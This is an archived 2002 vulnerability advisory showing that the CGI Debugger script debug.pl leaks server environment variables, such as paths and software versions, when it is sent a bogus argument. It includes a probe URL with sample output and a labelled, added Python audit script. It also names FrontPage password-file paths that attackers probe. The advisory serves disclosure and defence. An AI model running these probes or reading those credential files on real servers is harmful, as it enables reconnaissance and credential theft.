
Debug_Enviroment_Variables.txt

Posted Aug 29, 2002
Authored by Lawrence Lavigne | Site neoerudition.net

The CGI Debugger v1.0 (/cgi-bin/debug.pl) displays information that may be useful to an attacker including the document root and server version info when passed a bogus argument.

tags | cgi, root
SHA-256 | fb7ac98f8314c3a58ff56f24e2e1c29c135d75c2f619f967ff2229d80ec3171f

                                         NeoErudition Technologies

By: Lawrence Lavigne


Vulnerability: CGI Debugger v1.0
Remote: YES
Risk: HIGH


I have not found any information on Packetstorm or Security-Focus about this issue, but that is not to say it has not been addressed elsewhere. But for the security community's sake I will release what I can now.

Environment variables can be gleaned from a server running /cgi-bin/debug.pl by passing a bogus argument to the
script.

Example: http://www.domain.com/cgi-bin/debug.pl/* will produce:


DOCUMENT_ROOT "/usr/home17/dir/public_html"
GATEWAY_INTERFACE "CGI/1.1"
HTTP_ACCEPT "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, */*"
HTTP_ACCEPT_ENCODING "gzip, deflate"
HTTP_ACCEPT_LANGUAGE "en-us"
HTTP_CONNECTION "Keep-Alive"
HTTP_COOKIE "$1"
HTTP_HOST "www.domain.com"
HTTP_USER_AGENT "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
LOG_DIR "/usr/local/etc/httpd/log6/dir"
PATH "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin"
QUERY_STRING ""
REMOTE_ADDR "XXX.XXX.XXX.XXX"
REMOTE_PORT "3899"
REQUEST_METHOD "GET"
REQUEST_URI "/directory/cgi-bin/debug.pl/<script_name>"
REWRITE_ROOT "/usr/home17/dir/public_html"
SCRIPT_FILENAME "/usr/home17/dir/public_html/directory/cgi-bin/<script_name>"
SCRIPT_NAME "/directory/cgi-bin/*"
SCRIPT_URI "http://www.domain.com/directory/cgi-bin/debug.pl/<script_name>"
SCRIPT_URL "/directory/cgi-bin/debug.pl/*"
SERVER_ADDR "XXX.XXX.XXX.XXX"
SERVER_ADMIN "admin@domain.com"
SERVER_NAME "www.domain.com"
SERVER_PORT "80"
SERVER_PROTOCOL "HTTP/1.1"
SERVER_SIGNATURE ""
SERVER_SOFTWARE "Apache/1.3 (Unix) mod_perl/1.27 PHP/4.2.2 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.10 OpenSSL/0.9.6e"
UNIQUE_ID "PW1BEdH5k-4AAYO7Thw"

CANNOT EXECUTE:: /usr/home17/dir/public_html/directory/cgi-bin/<script_name>


NOTE: This server's IP, domain and other sensitive information have been omitted.



Note the information provided in SERVER_SOFTWARE. It reveals Apache version 1.3 (Unix), which an attacker may be aware
has a remote vulnerability that will permit remote execution of arbitrary commands. FrontPage 5.0.2.2510 may have
no currently known vulnerabilities but could tip off an attacker to check for the various Vermeer Technology Incorporated vti_pvt vulnerabilities such as /vti_pvt/service/pwd, /vti_pvt/administrators.pwd etc. Thankfully OpenSSL 0.9.6e does not suffer
from the arbitrary code execution vulnerability, but that seems moot considering what information debug.pl may provide an
attacker with.

SERVER_SOFTWARE is not the only sensitive information provided in this list by any means. A skilled intruder
can make use of much else that is here, which I will not detail here.
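
For administrators reviewing what one of their own pages discloses, the check below is an added example, not part of the original advisory or of CGI Debugger. It parses the NAME "value" dump format shown above and reports which fields expose filesystem layout, software versions or contact details; the sample input is constructed from the advisory's output and the category lists are an assumption.

```python
import re

# Constructed sample: a few lines in the NAME "value" format shown in the advisory.
SAMPLE = '''DOCUMENT_ROOT "/usr/home17/dir/public_html"
HTTP_HOST "www.domain.com"
LOG_DIR "/usr/local/etc/httpd/log6/dir"
SERVER_ADMIN "admin@domain.com"
SERVER_SOFTWARE "Apache/1.3 (Unix) mod_perl/1.27 PHP/4.2.2 OpenSSL/0.9.6e"
CANNOT EXECUTE:: /usr/home17/dir/public_html/directory/cgi-bin/<script_name>
'''

LINE_RE = re.compile(r'^([A-Z][A-Z0-9_]*) "(.*)"\s*$')
PRODUCT_RE = re.compile(r'([A-Za-z_][\w.-]*)/(\d[\w.]*)')

# Assumed classification (not from the advisory): which variables reveal
# filesystem layout, software inventory, or contact details.
RULES = {
    "filesystem_path": {"DOCUMENT_ROOT", "LOG_DIR", "REWRITE_ROOT",
                        "SCRIPT_FILENAME", "PATH"},
    "software_version": {"SERVER_SOFTWARE", "SERVER_SIGNATURE"},
    "contact": {"SERVER_ADMIN"},
}

def parse_env_dump(body):
    """Return {NAME: value} for every NAME "value" line in a response body."""
    env = {}
    for line in body.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            env[m.group(1)] = m.group(2)
    return env

def audit(body):
    """Classify disclosed variables and split SERVER_SOFTWARE into products."""
    env = parse_env_dump(body)
    findings = {}
    for category, names in RULES.items():
        hits = sorted(n for n in names if env.get(n))  # skip empty values
        if hits:
            findings[category] = hits
    products = dict(PRODUCT_RE.findall(env.get("SERVER_SOFTWARE", "")))
    # The error trailer leaks an absolute path outside the variable list.
    error_paths = re.findall(r'^CANNOT EXECUTE:: (/\S+)', body, re.M)
    return {"findings": findings, "products": products, "error_paths": error_paths}

if __name__ == "__main__":
    for key, value in audit(SAMPLE).items():
        print(key, value)
```

Any non-empty result for a page reachable without authentication means the script should be removed or access-restricted.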

Furthermore, executing debug.pl without an argument prompts for a script to execute or debug.
Example: http://www.domain.com/cgi-bin/debug.pl<enter> will give the following output:

Usage: /directory/cgi-bin/debug.pl/script-to-run

From the information provided and perhaps a quick audit, an intruder may be able to collect enough information
to successfully guess possible scripts to run debug.pl against. Possible code injection? Heap overflow?



NeoErudition Technologies
Lawrence Lavigne
administrator@neoerudition.net
http://neoerudition.net

